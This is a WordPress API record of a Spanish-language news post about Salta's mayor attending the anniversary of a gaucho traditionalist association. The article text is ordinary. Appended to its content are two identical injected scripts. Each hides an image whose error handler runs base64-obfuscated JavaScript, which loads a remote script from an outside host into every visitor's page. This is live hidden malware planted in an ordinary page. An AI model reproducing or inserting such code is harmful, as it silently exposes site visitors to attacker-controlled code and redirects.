{"id":1553,"date":"2022-09-27T13:00:49","date_gmt":"2022-09-27T16:00:49","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1553"},"modified":"2025-08-14T00:34:19","modified_gmt":"2025-08-14T03:34:19","slug":"bettina-romero-participo-del-aniversario-de-la-agrupacion-gauchos-de-guemes","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1553","title":{"rendered":"Bettina Romero particip\u00f3 del aniversario de la Agrupaci\u00f3n Gauchos de G\u00fcemes"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#820a28\"><strong><em>Al cumplirse 76 a\u00f1os de la existencia de esta instituci\u00f3n, se llev\u00f3 a cabo la celebraci\u00f3n por su fundaci\u00f3n y el acto oficial de cierre del Bicentenario del paso a la inmortalidad del General Mart\u00edn Miguel de G\u00fcemes.<\/em><\/strong><\/h4>\n\n\n\n<p>La intendenta, Bettina Romero, particip\u00f3 de la cena por el 76\u00b0 aniversario de la Agrupaci\u00f3n Tradicionalista, Gauchos de G\u00fcemes. En d\u00f3nde, tambi\u00e9n, se llev\u00f3 a cabo el acto oficial de cierre del Bicentenario del paso a la inmortalidad del General Mart\u00edn Miguel de G\u00fcemes.<\/p>\n\n\n\n<p>La celebraci\u00f3n se desarrollo en el predio Mart\u00edn Miguel de G\u00fcemes, en Lomas de Medeiros, d\u00f3nde se realiz\u00f3 una invocaci\u00f3n religiosa, cena de camarader\u00eda y posterior show folcl\u00f3rico y danzas criollas.<\/p>\n\n\n\n<p>Participaron de la ceremonia: el presidente de la Agrupaci\u00f3n Tradicionalista de Salta, Gauchos de G\u00fcemes, Francisco Araoz Figueroa y miembros de la instituci\u00f3n; el teniente coronel, Alejandro Baz\u00e1n G\u00fcemes,&nbsp; jefe del Regimiento de Caballer\u00eda de Exploraci\u00f3n de Monta\u00f1a \u00abGeneral G\u00fcemes\u00bb; y Fortines Gauchos de Salta.<\/p>\n\n\n\n<p><strong>Agrupaci\u00f3n Tradicionalista Gauchos de G\u00fcemes<\/strong><\/p>\n\n\n\n<p>El 23 de septiembre de 1946 un grupo de hombres salte\u00f1os tom\u00f3 la decisi\u00f3n de fundar una agrupaci\u00f3n que reuniera a los gauchos de la provincia. Con el objetivo de visibilizar y concientizar a la poblaci\u00f3n, sobre la importancia de las acciones y la figura del General Mart\u00edn Miguel de G\u00fcemes, para la identidad Nacional.<\/p>\n\n\n\n<p>La idea naci\u00f3 de Adolfo G\u00fcemes y N\u00e9stor Patr\u00f3n Costas, quienes fueron los mentores de la agrupaci\u00f3n.<\/p>\n\n\n\n<p>Acompa\u00f1aron a la intendenta, Bettina Romero: el secretario de Cultura y Turismo, Fernando Garc\u00eda Soria y la interventora de Espacios P\u00fablicos, Susana Pontussi.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/prensa.municipalidadsalta.gob.ar\/bettina-romero-participo-del-aniversario-de-la-agrupacion-gauchos-de-guemes\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"178\" height=\"99\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/Captura-web_26-8-2022_104031_prensa.municipalidadsalta.gob_.ar_.jpeg\" alt=\"\" class=\"wp-image-1375\"\/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Al cumplirse 76 a\u00f1os de la existencia de esta instituci\u00f3n, se llev\u00f3 a cabo la celebraci\u00f3n por su fundaci\u00f3n y el acto oficial de cierre del Bicentenario del paso a la inmortalidad del General Mart\u00edn Miguel de G\u00fcemes. La intendenta, Bettina Romero, particip\u00f3 de la cena por el 76\u00b0 aniversario de la Agrupaci\u00f3n Tradicionalista, Gauchos [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1554,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[17],"tags":[],"class_list":{"0":"post-1553","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1553"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1553"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1553\/revisions"}],"predecessor-version":[{"id":7334,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1553\/revisions\/7334"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1554"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1553"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1553"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1553"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}